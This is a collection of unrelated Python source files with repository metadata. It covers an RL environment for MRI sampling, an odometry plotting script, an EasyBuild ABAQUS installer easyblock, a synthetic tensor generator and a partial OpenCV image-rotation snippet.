import matplotlib.pyplot as plt
import torch
from torch import autograd
import gym.spaces
sys.path.append('/home/davidyzeng/machinelearning/cones/python/packages/mrirecon')
sys.path.append('/home/davidyzeng/recon_pytorch')
import class_gan_unrolled
import bartwrap
import torchvision
###################
# For reconstruction environments, the API is a torch.Tensor.cuda()
# im: [256,256,2]
# sense: [1,8,256,256]
# mask: [1,256,256]
# returns: [256,256,2]
def ifft2c(x):
    """Centered, orthonormal 2-D inverse FFT over the last two axes."""
    shifted = np.fft.ifftshift(x, axes=(-1, -2))
    img = np.fft.ifft2(shifted, norm='ortho')
    return np.fft.fftshift(img, axes=(-1, -2))
def fft2c(x):
    """Centered, orthonormal 2-D forward FFT over the last two axes."""
    shifted = np.fft.fftshift(x, axes=(-1, -2))
    spectrum = np.fft.fft2(shifted, norm='ortho')
    return np.fft.ifftshift(spectrum, axes=(-1, -2))
class unrolled_recon():
    """Reconstruction callable backed by a pretrained unrolled network.

    Loads network weights from a checkpoint and runs inference on the GPU
    ('cuda:0' is hard-coded).
    """
    # expects im[1,2,256,256]
    # sense [1,8,256,256]
    # mask [1,256,256]
    def __init__(self,filepath=None):
        # Default checkpoint location used when none is supplied.
        if filepath == None:
            filepath = '/mnt/dense/grace/20180726_2136/350000.ckpt'
        self.recon_net = class_gan_unrolled.Unrolled([256,256], unroll_layers=5, res_blocks=3, res_layers=2)
        self.device = 'cuda:0'
        recon_net_ckpt = torch.load(filepath)
        self.recon_net.load_state_dict(recon_net_ckpt['state_dict'])
        self.recon_net.cuda()
        self.recon_net.eval()
    def __call__(self, im, sense, mask):
        # im arrives as [256,256,2]; add a batch axis and move channels first.
        im = torch.Tensor(np.expand_dims(np.transpose(im,(2,0,1)),axis=0)).to(self.device)
        mask = torch.Tensor(mask).to(self.device)
        sense = np.transpose(np.expand_dims(sense, axis=0),(0,2,3,4,1))
        sense = torch.Tensor(sense).to(self.device)
        y = self.recon_net(im, sense, mask)
        y = y.cpu().detach().numpy() # [1,2,256,256]
        # NOTE(review): both terms index the full channel axis identically, so
        # real and imaginary parts come out equal — was y[0,0]+1j*y[0,1]
        # intended here? Confirm before relying on the complex result.
        y = y[0,:,:,:] + 1j*y[0,:,:,:]
        y = np.transpose(y,(1,2,0))
        del im, mask, sense
        return y
class cs_recon():
    """Compressed-sensing reconstruction via BART (bartwrap.bart_cs)."""
    def __init__(self):
        pass
    def __call__(self, im, sense, mask):
        #ii = im.cpu().numpy()
        #ii = ii[0,0,:,:] + 1j*ii[0,1,:,:]
        # Recombine the two trailing channels into a complex image, transform
        # to k-space, run the CS recon, then split back into 2 real channels.
        # NOTE: sense and mask are accepted for API parity but unused here.
        ii = im[:,:,0] + 1j*im[:,:,1]
        kk = fft2c(ii)
        y_hat = bartwrap.bart_cs(kk)
        y_hat = np.stack((y_hat.real,y_hat.imag),axis=-1)
        #y_hat = torch.Tensor(y_hat).cuda()
        return y_hat
class fft_recon():
    """Identity 'reconstruction': returns the zero-filled input unchanged.

    sense and mask are accepted only for API parity with the other recons.
    """

    def __init__(self):
        pass

    def __call__(self, im, sense, mask):
        # Baseline: the aliased input image is the output.
        return im
###################
# For rewards, the API is a [256,256,2] numpy array, single number output
class discriminator_reward():
    """Reward = GAN discriminator score of a reconstructed image."""
    def __init__(self,filepath=None):
        # Default discriminator checkpoint location.
        if filepath == None:
            filepath = '/media/cineraid/davidyzeng/recon_pytorch_runs/gan/20180808_0129/5000.ckpt'
        self.reward_net = class_gan_unrolled.Discriminator()
        reward_net_ckpt = torch.load(filepath)
        self.reward_net.load_state_dict(reward_net_ckpt['state_dictD'])
        self.reward_net.cuda()
        self.reward_net.eval()
    def __call__(self, im):
        # [256,256,2] -> [1,2,256,256] GPU tensor; return the scalar score.
        im = torch.Tensor(np.expand_dims(np.transpose(im,(2,0,1)),axis=0)).cuda()
        return self.reward_net(im).item()
class L2_reward():
    """L2 reward: sqrt of the summed squared per-pixel complex magnitudes,
    divided by the total element count of the input array."""

    def __init__(self):
        pass

    def __call__(self, im):
        # Per-pixel magnitude over the trailing (real, imag) axis.
        magnitudes = np.linalg.norm(im, ord=2, axis=-1)
        return np.sqrt(np.sum(magnitudes ** 2)) / im.size
class L1_reward():
    """L1 reward: sum of per-pixel complex magnitudes divided by the total
    element count of the input array."""

    def __init__(self):
        pass

    def __call__(self, im):
        # Per-pixel magnitude over the trailing (real, imag) axis.
        magnitudes = np.linalg.norm(im, ord=2, axis=-1)
        return magnitudes.sum() / im.size
###################
class recon_env():
    """RL environment for learning MRI k-space line-sampling policies.

    Wraps a reconstruction callable and an error-metric callable. Actions
    select phase-encode lines (0-255); observations are magnitude images of
    the current reconstruction; reward is the step-wise decrease in
    reconstruction error relative to the fully-sampled reference,
    normalized by the initial error.
    """
    def __init__(self, recon, reward, base_dir,R=2):
        self.curr_img = np.zeros((1,256,256,2))
        self.sampled_lines = np.zeros((256,),dtype=np.float32)
        self.mask = np.zeros((256,256),dtype=np.float32)
        # Validation k-space and sensitivity maps from a fixed HDF5 file.
        data_file = '/home_local/grace/pytorch_data.h5'
        f = h5.File(data_file,'r')
        self.kspace = f['validate_kspace']
        self.sense = f['validate_sense']
        self.sensemap_data = None
        self.Y_Y = None
        self.mask_data = None
        self.recon = recon    # reconstruction callable (e.g. unrolled_recon)
        self.reward = reward  # error metric callable (e.g. L2_reward)
        #self.reward_history = np.zeros((256,)) #qqq
        self.line_order = np.zeros((256,))
        self.reward_order = np.zeros((256,))
        self.action_space = gym.spaces.Discrete(256)
        self.game_over = False
        self.sample_image = np.zeros((256,256))
        self.base_dir = base_dir
        # NOTE(review): logdir is computed but never used or stored.
        logdir = os.path.join(base_dir,'imglog')
        self.total_done = 0
    def reset(self):
        # Start a new episode: pick a slice, clear mask/state, and compute the
        # fully-sampled reference reconstruction plus its baseline error.
        del self.sensemap_data, self.Y_Y
        idx = np.random.randint(self.kspace.shape[0])
        # NOTE(review): the random index is immediately overridden — every
        # episode uses slice 83.
        idx = 83
        print(idx)
        #idx = 2000 #qqq
        self.curr_img = 0*self.curr_img
        self.sampled_lines = 0*self.sampled_lines
        self.mask = 0*self.mask
        # Rebuild the complex multicoil k-space (first 8 rows real, last 8
        # imaginary) and normalize by its peak magnitude.
        complex_kspace = self.kspace[idx,0:8,:,:] + 1j*self.kspace[idx,8:,:,:]
        complex_kspace = complex_kspace/(np.amax(np.abs(complex_kspace))+1e-6)
        complex_im = ifft2c(complex_kspace)
        complex_sense = self.sense[idx,0:8,:,:] + 1j*self.sense[idx,8:,:,:]
        self.im0 = complex_im*np.conj(complex_sense)
        self.im0 = np.sum(self.im0.real,axis=0) # grace added
        y_im = np.stack((self.im0.real,self.im0.imag),axis=-1).astype(np.float32)
        #y_im = np.expand_dims(y_im,0)
        self.sensemap = np.stack((complex_sense.real,complex_sense.imag),axis=-1)
        self.sensemap = np.transpose(self.sensemap, (0,3,1,2))
        #self.sensemap = np.expand_dims(self.sensemap,0)
        self.sensemap_data = self.sensemap
        Y_data = y_im
        # Fully-sampled reference reconstruction and its error; used to
        # normalize all subsequent rewards.
        self.Y_Y = self.recon(Y_data, self.sensemap_data, np.ones((1,256,256)))
        self.base_reward = self.reward(self.Y_Y)
        self.prev_reward = self.reward(self.Y_Y)/self.base_reward
        self.game_over = False
        del Y_data
        return np.zeros((256,256))
    def step(self, action):
        # If we have already sampeld the line, strongly penalize it
        already_sampled = False
        if self.sampled_lines[action] == 1:
            already_sampled = True
        self.sampled_lines[action] += 1.
        self.mask[action,:] = 1.
        # Simulate acquisition: mask the reference k-space and reconstruct
        # from the zero-filled result.
        x_kspace = fft2c(self.im0)
        x_kspace = x_kspace*self.mask
        x_im = ifft2c(x_kspace)
        x_im = np.stack((x_im.real, x_im.imag),axis=-1).astype(np.float32)
        #x_im = np.expand_dims(x_im,0)
        # grace
        mag_input = np.abs(self.im0)
        mag_input = np.expand_dims(mag_input, axis=0)
        mag_input = torch.Tensor(mag_input)
        torchvision.utils.save_image(mag_input, "./real_mag_input.png") # comment to change reward
        # endgrace
        X_data = x_im
        self.mask_data = np.expand_dims(self.mask,0)
        self.curr_img = self.recon(X_data, self.sensemap_data, self.mask_data)
        # Current reconstruction error relative to the reference, normalized.
        curr_reward = self.reward(self.curr_img-self.Y_Y)/self.base_reward
        #print(curr_reward.item(), action-128)
        # grace
        real = self.curr_img[:, :, 0]
        imag = self.curr_img[:, :, 1]
        output = np.abs(real + 1j * imag)
        output = np.expand_dims(output, axis=0)
        output = torch.Tensor(output)
        torchvision.utils.save_image(output, "./real_output.png") # comment to change reward
        ## end grace
        # Reward is the drop in normalized error since the previous step.
        reward = self.prev_reward - curr_reward
        #reward = reward - 0.02
        self.prev_reward = curr_reward
        if already_sampled:
            reward = -10
        #self.reward_history[int(np.sum(self.sampled_lines))-1] = reward #qqq
        self.line_order[int(np.sum(self.sampled_lines))-1] = action
        self.reward_order[int(np.sum(self.sampled_lines))-1] = reward
        done = False
        #if curr_reward < 0.30:
        #	done = True
        if np.sum(self.sampled_lines) == 256:
            done = True
            self.game_over = True
        if done: #qqq
            # Episode finished: dump the chosen line order / rewards and a
            # visualization, then hard-terminate the process.
            self.total_done += 1
            np.save('/home_local/grace/og/dopamine/dopamine/recon_env/grace_l2_order.npy',self.line_order.astype(int))
            np.save('/home_local/grace/og/dopamine/dopamine/recon_env/grace_l2_reward.npy',self.reward_order)
            im_out = np.zeros((256,256))
            im_out[np.arange(256),self.line_order.astype(int)] = 1
            im_out = np.expand_dims(im_out,axis=0)
            im_out = torch.Tensor(im_out)
            torchvision.utils.save_image(im_out, "./decision_order.png")
            del im_out
            sys.exit(0)
        # plt.figure(), plt.plot(np.cumsum(self.reward_history))
        # plt.figure(), plt.scatter(np.linspace(0,255,256),self.line_order), plt.show()
        # #np.save('reward_unr_di.npy',self.reward_history)
        info = self.sampled_lines
        new_state = self.curr_img
        # Observation: magnitude image of the current reconstruction.
        new_state = np.abs(new_state[:,:,0] + 1j*new_state[:,:,1])
        del X_data
        return new_state, reward, done, info
    def get_sampled_lines(self):
        # Per-line sample counts for the current episode.
        return self.sampled_lines
    def get_curr_img(self):
        # Latest reconstruction ([256,256,2]).
        return self.curr_img
    def get_ref_img(self):
        # Fully-sampled reference reconstruction.
        return self.Y_Y
    def get_mask(self):
        # Current sampling mask with leading batch axis.
        return self.mask_data
    def get_curr_reward(self):
        # Latest normalized reconstruction error.
        return self.prev_reward
    def render(self):
        # Side-by-side magnitude display: current recon vs ground truth.
        plt.subplot(1,2,1)
        plt.imshow(np.abs(self.curr_img),cmap='gray')
        plt.subplot(1,2,2)
        plt.imshow(np.abs(self.im0),cmap='gray')
        plt.show()
|
[
"2018glu@tjhsst.edu"
] |
2018glu@tjhsst.edu
|
d87794e59d904a6d3668c7599663d45fdb747333
|
866e3821ad7ffca81a0ea17ba88889c505501f03
|
/Kyb_prog/basement_measures/basement_monday/ancien_plot_square.py
|
b66ec97ee5e6003d3c01bc8cd7be449f0d4a7fba
|
[] |
no_license
|
Deastan/small_softwares
|
fb3e9f845500cec8eb134e604829cfe943036a03
|
8d45ca538f7796eefab7cf94f2a673aee2ca7fc1
|
refs/heads/master
| 2020-03-31T09:38:27.382945
| 2018-11-12T08:23:29
| 2018-11-12T08:23:29
| 152,104,291
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,855
|
py
|
import matplotlib.pyplot as plt
import numpy as np
import csv
# Initialize and Read data from CSV
# Module-level trajectory buffers, filled by function() and cleared on
# every call.
base_link_x_odom_camera = []
base_link_y_odom_camera = []
def function(file_name_arg):
    """For each hard-coded ground-truth waypoint, find the closest point of
    the robot trajectory stored in *file_name_arg* (CSV; columns 6 and 7 hold
    the x/y positions in the camera frame).

    Returns:
        (err_min_1, err_min_1, n_1, Strecke_1): per-waypoint minimum distances,
        the trajectory indices where those minima occur, and the waypoints.

    NOTE(review): the first two returned values are the *same* array — one of
    them was probably meant to be something else; confirm against callers.
    """
    #*******************************************************************************
    # Parameters
    #*******************************************************************************
    file_name = file_name_arg
    # Define waypoints
    # Strecke_1 = [[1.0, -1.5],
    # [3.7, -1.5],
    # [3.7, -6],
    # [1.0, -6]]
    Strecke_1 = [[3.5, 0.5],
    [1.5, 0.5],
    [1.5, 4.5],
    [2.5, 4.5],
    [3.5, 4.5],
    [3.5, 1.5],
    [1.5, 1.5]]
    numberPoints = len(Strecke_1) # number points of Ground_Truth
    data_soll = Strecke_1;
    #*******************************************************************************
    # Get data from .csv
    #*******************************************************************************
    # Reset the module-level buffers before re-reading the trajectory.
    del base_link_x_odom_camera[:]
    del base_link_y_odom_camera[:]
    with open(file_name,'r') as csvfile:
        next(csvfile)
        plots = csv.reader(csvfile, delimiter=',')
        for row in plots:
            # don't forget the multiply by -1
            base_link_x_odom_camera.append(np.multiply(1, float(row[6])))
            base_link_y_odom_camera.append(np.multiply(1, float(row[7])))
    x_err_1 = np.empty((numberPoints, len(base_link_x_odom_camera)))
    y_err_1 = np.empty((numberPoints, len(base_link_x_odom_camera)))
    err_abs_1 = np.empty((numberPoints, len(base_link_x_odom_camera)))
    err_min_1 = np.empty((numberPoints, 1))
    n_1 = np.empty((numberPoints, 1))
    #*******************************************************************************
    # Min calulation
    #*******************************************************************************
    # Assumptions : - The min point from odom are the closest to Strecke_1, if the
    # robot drift, you could not have the real min which that mean it pass not in
    # the right moment moment where you think.
    for i in range(0, numberPoints, 1):#len(base_link_x_odom_camera), 1):
        # print(Strecke_1[i][0])
        # Euclidean distance from waypoint i to every trajectory sample.
        x_err_1[i,] = np.subtract(data_soll[i][0], base_link_x_odom_camera)
        y_err_1[i,] = np.subtract(data_soll[i][1], base_link_y_odom_camera)
        err_abs_1[i,] = np.power(np.add(np.power(x_err_1[i,], 2), np.power(y_err_1[i,], 2)), 0.5)
        err_min_1[i] = min(err_abs_1[i,])
        n_1[i] = err_abs_1[i,].tolist().index(min(err_abs_1[i,]))
    # end of the loop
    return (err_min_1, err_min_1, n_1, Strecke_1)
if __name__== "__main__":
    # Plot the recorded trajectory against the ground-truth waypoints and mark,
    # for each waypoint, the closest trajectory sample with its distance.
    plt.rcParams.update({'font.size': 30})
    file_name = 'pascale_square-base_link_odom_camera_is1500.csv'
    err_min_1, err_min_1, n_1, Strecke_1 = function(file_name)
    # print(Strecke_1[int(1)][int(1)])
    f = plt.figure(1, figsize=(40, 32))
    ax = f.add_subplot(111)
    for i in range(0, len(Strecke_1), 1):
        # Waypoint (red) and its nearest trajectory sample (blue), with the
        # minimum distance shown in the legend.
        plt.plot(Strecke_1[int(i)][int(0)], Strecke_1[int(i)][int(1)], 'o' ,color='red', markersize=20, label="Ground truth Point " +str(i+1) + ": "+str(Strecke_1[i]))
        plt.plot(base_link_x_odom_camera[int(n_1[i])], base_link_y_odom_camera[int(n_1[i])], 'o' ,color='blue', markersize=20, label="Point " +str(i+1) + ": " + str(err_min_1[i]) + " m")
        plt.annotate(
        str('( ' + str(Strecke_1[int(i)][int(0)]) +', ' + str(Strecke_1[int(i)][int(1)]) + ')'),
        xy=((Strecke_1[int(i)][int(0)]+0.0), (Strecke_1[int(i)][int(1)])+0.0), xytext=(-10, 10),
        textcoords='offset points', ha='right', va='bottom',
        bbox=dict(boxstyle='round,pad=0.5', fc='grey', alpha=0.5),
        arrowprops=dict(arrowstyle = '->', connectionstyle='arc3,rad=0'))
    plt.plot(base_link_x_odom_camera, base_link_y_odom_camera, label='Robot position in camera frame')
    # plt.plot(base_link_y_odom_camera_tf, base_link_x_odom_camera_tf, label='Camera position in Base link frame with tf')
    # plt.plot(base_camera_y_odom_camera, base_camera_x_odom_camera, label='Camera position in Base camera frame')
    # ax.annotate('local max', xy=(2, 1), xytext=(3, 1.5),
    # arrowprops=dict(facecolor='black', shrink=0.05),
    # )
    plt.xlabel('x [m]')
    plt.ylabel('y [m]')
    plt.xlim(0.0, 6.0)
    plt.ylim(0.0, 7.0)
    # plt.title('Measurment of the odometry' + '\n' + file_name)
    # plt.legend()
    plt.legend(numpoints=1, bbox_to_anchor=(0., 1.02, 1., .102), loc=1,
    ncol=3, mode="expand", borderaxespad=0.) #bbox_to_anchor=(0., 1.02, 1., .102)
    # plt.legend(numpoints=1, bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)
    # plt.legend(numpoints=1, bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)
    # f.set_size_inches(20, 15)
    f.savefig(file_name+'.png')
    # plt.close(f)
    plt.show()
|
[
"jonathanburkhard@gmail.com"
] |
jonathanburkhard@gmail.com
|
919750486a16f8c3cf80e42b43fd1e58be908f63
|
d554b1aa8b70fddf81da8988b4aaa43788fede88
|
/5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/225/users/3985/codes/1573_2896.py
|
a9348aa62d031277329e3677d5ab5bd9214ac882
|
[] |
no_license
|
JosephLevinthal/Research-projects
|
a3bc3ca3b09faad16f5cce5949a2279cf14742ba
|
60d5fd6eb864a5181f4321e7a992812f3c2139f9
|
refs/heads/master
| 2022-07-31T06:43:02.686109
| 2020-05-23T00:24:26
| 2020-05-23T00:24:26
| 266,199,309
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
# Use this code as a starting point
# Reading of input values
var = input("Ronald")
# Printing of outputs
print(var)
|
[
"jvlo@icomp.ufam.edu.br"
] |
jvlo@icomp.ufam.edu.br
|
0fba8a518aa68231f1284ad13a489d5bd29a862d
|
b24b7dd81d50aa3e60dba3322df75a333b974546
|
/1.13.0/easyblock/easyblocks/a/abaqus.py
|
e592705ab5a7be957bef8285898b631d2461cce4
|
[] |
no_license
|
lsuhpchelp/easybuild_smic
|
8d51b8a7244265a0faa2f4713654a503c9736779
|
3c5434f9a4193fbe4cf8107327faadda83d798ae
|
refs/heads/master
| 2020-12-24T14:46:04.652060
| 2020-09-08T17:01:46
| 2020-09-08T17:01:46
| 19,581,280
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,892
|
py
|
##
# Copyright 2009-2013 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://vscentrum.be/nl/en),
# the Hercules foundation (http://www.herculesstichting.be/in_English)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for ABAQUS, implemented as an easyblock
@author: Stijn De Weirdt (Ghent University)
@author: Dries Verdegem (Ghent University)
@author: Kenneth Hoste (Ghent University)
@author: Pieter De Baets (Ghent University)
@author: Jens Timmerman (Ghent University)
"""
import os
from easybuild.easyblocks.generic.binary import Binary
from easybuild.framework.easyblock import EasyBlock
from easybuild.tools.filetools import run_cmd
class EB_ABAQUS(Binary):
    """Support for installing ABAQUS."""
    # NOTE: this easyblock is Python 2 code (file(), `except E, err` syntax).
    def __init__(self, *args, **kwargs):
        """Initialisation of custom class variables for ABAQUS."""
        super(EB_ABAQUS, self).__init__(*args, **kwargs)
        # Path of the generated silent-install properties file; filled in
        # by configure_step() and consumed by install_step().
        self.replayfile = None
    def extract_step(self):
        """Use default extraction procedure instead of the one for the Binary easyblock."""
        EasyBlock.extract_step(self)
    def configure_step(self):
        """Configure ABAQUS installation.

        Writes an installer.properties file that drives a silent install.
        """
        try:
            self.replayfile = os.path.join(self.builddir, "installer.properties")
            txt = '\n'.join([
                "INSTALLER_UI=SILENT",
                "USER_INSTALL_DIR=%s" % self.installdir,
                "MAKE_DEF_VER=true",
                "DOC_ROOT=UNDEFINED",
                "DOC_ROOT_TYPE=false",
                "DOC_ROOT_ESCAPED=UNDEFINED",
                "ABAQUSLM_LICENSE_FILE=@abaqusfea",
                "LICENSE_SERVER_TYPE=FLEXNET",
                "PRODUCT_NAME=Abaqus %s" % self.version,
                "TMPDIR=%s" % self.builddir,
                "INSTALL_MPI=1",
            ])
            f = file(self.replayfile, "w")
            f.write(txt)
            f.close()
        except IOError, err:
            self.log.error("Failed to create install properties file used for replaying installation: %s" % err)
    def install_step(self):
        """Install ABAQUS using 'setup'."""
        os.chdir(self.builddir)
        if self.cfg['install_cmd'] is None:
            # Default setup binary lives in <builddir>/<name>-<major version>/.
            self.cfg['install_cmd'] = "%s/%s-%s/setup" % (self.builddir, self.name, self.version.split('-')[0])
            self.cfg['install_cmd'] += " -nosystemcheck -replay %s" % self.replayfile
        super(EB_ABAQUS, self).install_step()
    def sanity_check_step(self):
        """Custom sanity check for ABAQUS."""
        # Version "A.B.C-..." installs into directory "A.B-C".
        verparts = self.version.split('-')[0].split('.')
        custom_paths = {
            'files': [os.path.join("Commands", "abaqus")],
            'dirs': ["%s-%s" % ('.'.join(verparts[0:2]), verparts[2])]
        }
        super(EB_ABAQUS, self).sanity_check_step(custom_paths=custom_paths)
    def make_module_req_guess(self):
        """Update PATH guesses for ABAQUS."""
        guesses = super(EB_ABAQUS, self).make_module_req_guess()
        guesses.update({
            'PATH': ['Commands'],
        })
        return guesses
|
[
"lyan1@tigers.lsu.edu"
] |
lyan1@tigers.lsu.edu
|
09f09bdd5c739d846d270d56dd77407bac6647a8
|
3dcb21b4d9d1862fcee8ad7186128e8efe64feff
|
/createSingleSyntheticTensors.py
|
0c2d20c89647d4ad0947216f61250b8286bdd09c
|
[
"BSD-2-Clause"
] |
permissive
|
kaggour/CPD-MWU
|
db27f4c4ec06da4193c03813e089763c98623805
|
123efa828d07b5aceea6d7cb9920c1ea290216f9
|
refs/heads/master
| 2020-04-01T00:11:51.652296
| 2019-03-15T12:28:55
| 2019-03-15T12:28:55
| 152,686,324
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,474
|
py
|
#####################################################################
#####################################################################
#
# Create synthetic tensors with K slices, each of dimension I x J x Ki
# and save to HDFS. Use R as the number of components in each tensor.
# Tensors can have different levels of homo- and heteroskedastic error
# and different levels of collinearity in the factor matrices.
#
# Kareem S. Aggour <aggour@ge.com>
#
# NOTE: X dimensions are of the form [z,x,y] NOT [x,y,z]!!!!!
#
#####################################################################
#####################################################################
import numpy as np
import subprocess, sys
import math
import argparse
from tensorly.kruskal import kruskal_to_tensor
from tensorly.tenalg import norm
#####################################################################
# input variables
#####################################################################
# tensor slice dimensions: I x J x Ki
I = 0
J = 0
#Ki = 0
# number of slices -- note that final tensor will be I x J x (Ki*K)!!
K = 0
# rank of tensors
R = 0
# number of tensors to create
N = 0
# levels of factor matrix column collinearity
#cRange = [0, 0.5, 0.9]
cRange = [0.9]
# levels of homoskedastic error
#l1Range = [0, 1, 5, 10]
#l1Range = [0, 10]
l1Range = [0]
# levels of heteroskedastic error
#l2Range = [0, 1, 5]
#l2Range = [0, 5]
l2Range = [0]
#####################################################################
# global variables
#####################################################################
A = 0
B = 0
c = 0
outputDir=''
hdfsDir=''
def strReplace(filename):
    """Strip every occurrence of the literal ', # W, ' from *filename*,
    rewriting the file in place."""
    with open(filename) as src:
        cleaned = src.read().replace(', # W, ', '')
    with open(filename, 'w') as dst:
        dst.write(cleaned)
def outerProduct(A, B, C):
    """Dense CP (Kruskal) reconstruction: X[k,i,j] = sum_r A[i,r]*B[j,r]*C[k,r].

    Relies on the module-level dimensions I, J, K and rank R.
    """
    X = np.zeros((K, I, J))
    for i in range(I):
        for j in range(J):
            for k in range(K):
                acc = 0.0
                for r in range(R):
                    acc += A.item(i, r) * B.item(j, r) * C.item(k, r)
                X[k, i, j] = acc
    return X
def createCollinearMatrix(rows, R, congruence):
    """Random (rows x R) matrix whose columns are unit-norm with pairwise
    inner products equal to *congruence*.

    Built as Q @ L, where Q has orthonormal columns (QR of a random matrix)
    and L is the upper Cholesky factor of the target congruence matrix, so
    that (QL)^T (QL) = L^T L = F.
    """
    target = np.ones((R, R)) * congruence
    np.fill_diagonal(target, 1)
    chol_upper = np.linalg.cholesky(target).T
    Q, _ = np.linalg.qr(np.random.rand(rows, R))
    return np.dot(Q, chol_upper)
def createTensorSlice():
    """Generate one synthetic tensor from the module-level factors A, B (and a
    fresh C), add every configured combination of homoskedastic (l1) and
    heteroskedastic (l2) noise, and save each variant as X.npy under its
    per-configuration output directory.

    Uses module-level globals: I, J, K, R, c, A, B, l1Range, l2Range,
    outputDir, globalN.

    Returns:
        An empty list (the result is written to disk, not returned).
    """
    ret = []
    for row in range(0,1):
        # Third factor matrix: collinear columns when c > 0, else uniform random.
        if c > 0:
            Ci = createCollinearMatrix(K,R,c)
        else:
            Ci = np.random.rand(K,R)
        #Xi = outerProduct (A, B, Ci)
        Xi = kruskal_to_tensor([Ci, A, B])
        # Two independent noise tensors: N1 (homoskedastic), N2 (heteroskedastic).
        N1 = np.random.randn(K,I,J)
        N2 = np.random.randn(K,I,J)
        normXi = norm(Xi, 2)
        normN1 = norm(N1, 2)
        normN2 = norm(N2, 2)
        filename = 'X.npy'
        for l1 in l1Range:
            for l2 in l2Range:
                add = '-C'+str(c)+'-L1_'+str(l1)+'-L2_'+str(l2)+'-'+str(globalN)+'/'
                newOutputDir = outputDir + add
                # Scale noise so l1/l2 express a percentage of total signal power.
                if l1 > 0:
                    Xi1 = Xi + math.pow(((100/l1) - 1), -0.5)*(normXi/normN1)*N1
                else:
                    Xi1 = Xi
                if l2 > 0:
                    N2Xi1 = N2 * Xi1
                    Xi2 = Xi1 + math.pow(((100/l2) - 1), -0.5)*(norm(Xi1, 2)/norm(N2Xi1, 2))*N2Xi1
                else:
                    Xi2 = Xi1
                np.save(newOutputDir + filename, Xi2)
    # print Xi.shape
    return ret
if __name__ == "__main__":
global globalN
parser = argparse.ArgumentParser(description='Create a tensor to test Spark-based implementation of PARAFAC-ALS.')
# parser.add_argument('-I', '--i', help='I dimension', type=int, required=False, default=366)
# parser.add_argument('-J', '--j', help='J dimension', type=int, required=False, default=366)
# parser.add_argument('-Ki', '--ki', help='Ki dimension', type=int, required=False, default=5)
# parser.add_argument('-K', '--k', help='K dimension', type=int, required=False, default=20000)
parser.add_argument('-I', '--i', help='I dimension', type=int, required=False, default=100)
parser.add_argument('-J', '--j', help='J dimension', type=int, required=False, default=100)
# parser.add_argument('-Ki', '--ki', help='Ki dimension', type=int, required=False, default=5)
parser.add_argument('-K', '--k', help='K dimension', type=int, required=False, default=10000)
parser.add_argument('-R', '--rank', help='Tensor rank, i.e., number of components in decomposition', type=int, required=False, default=5)
parser.add_argument('-C', '--c', help='Collinearity (0=N, 1=Y)', type=int, required=False, default=0)
parser.add_argument('-H', '--h', help='Homo- and heteroskedastic noise (0=N, 1=Y)', type=int, required=False, default=0)
parser.add_argument('-N', '--n', help='Number of tensors', type=int, required=False, default=0)
args = parser.parse_args()
I = args.i
J = args.j
# Ki = args.ki
K = args.k
R = args.rank
C = args.c
H = args.h
N = args.n
#outputDir='/mnt/isilon/aggour/rpi/spark/data-100x1000x5x30/'
label = str(I)+'x'+str(J)+'x'+str(K)+'-R'+str(R)
if C == 0:
cRange = [0]
if H == 0:
l1Range = [0]
l2Range = [0]
outputDir='/home/aggour/rpi/dissertation/purePython/input/data-' + label
for globalN in range(0,N):
for c in cRange:
for l1 in l1Range:
for l2 in l2Range:
add = '-C'+str(c)+'-L1_'+str(l1)+'-L2_'+str(l2)+'-'+str(globalN)+'/'
newOutputDir = outputDir + add
print newOutputDir
subprocess.call(['mkdir ' + newOutputDir], shell=True)
subprocess.call(['chmod 777 ' + newOutputDir], shell=True)
for globalN in range(0,N):
for c in cRange:
print 'c =',c
# if congruence is not 0 then need to make the factor matrices collinear!
if c > 0:
A = createCollinearMatrix(I,R,c)
a0=A[:,0]
a1=A[:,1]
a2=A[:,2]
a3=A[:,3]
print ' a01:',np.dot(a0, a1) / (np.linalg.norm(a0) * np.linalg.norm(a1))
print ' a23:',np.dot(a2, a3) / (np.linalg.norm(a2) * np.linalg.norm(a3))
B = createCollinearMatrix(J,R,c)
a0=B[:,0]
a1=B[:,1]
a2=B[:,2]
a3=B[:,3]
print ' b01:',np.dot(a0, a1) / (np.linalg.norm(a0) * np.linalg.norm(a1))
print ' b23:',np.dot(a2, a3) / (np.linalg.norm(a2) * np.linalg.norm(a3))
else:
A = np.random.rand(I,R)
B = np.random.rand(J,R)
createTensorSlice()
#print 'Number of files created:',rdd.count()
# subprocess.call(['hadoop fs -moveFromLocal ' + outputDir + '* ' + hdfsDir], shell=True)
|
[
"aggour@ge.com"
] |
aggour@ge.com
|
7d3a17ab252f86c2831baf7b3e954a54fef6b79f
|
17db646bd3588a879cede520066c4f86b0488244
|
/画像の表示,縮小拡大,回転,二値化/画像回転.py
|
d3de24dd671434f49ade6f12fce0fe9edc33cd41
|
[] |
no_license
|
masaya-ueda/Masayagithub
|
7766671f41fa5f52fa3deb1d937319d8063507f6
|
018c1182eeb721d3269dc46a6c97dcc2da641e7f
|
refs/heads/master
| 2022-11-15T23:18:11.113722
| 2020-06-28T17:56:32
| 2020-06-28T17:56:32
| 254,563,146
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 350
|
py
|
import numpy as np
import cv2
img = cv2.imread(r'C:\Users\mueda\Documents\blog-thumb18.jpg')
height = img.shape[0]
width = img.shape[1]
center = (int(width/2), int(height/2))
angle = 90
scale = 1
trans = cv2.getRotationMatrix2D(center, angle , scale)
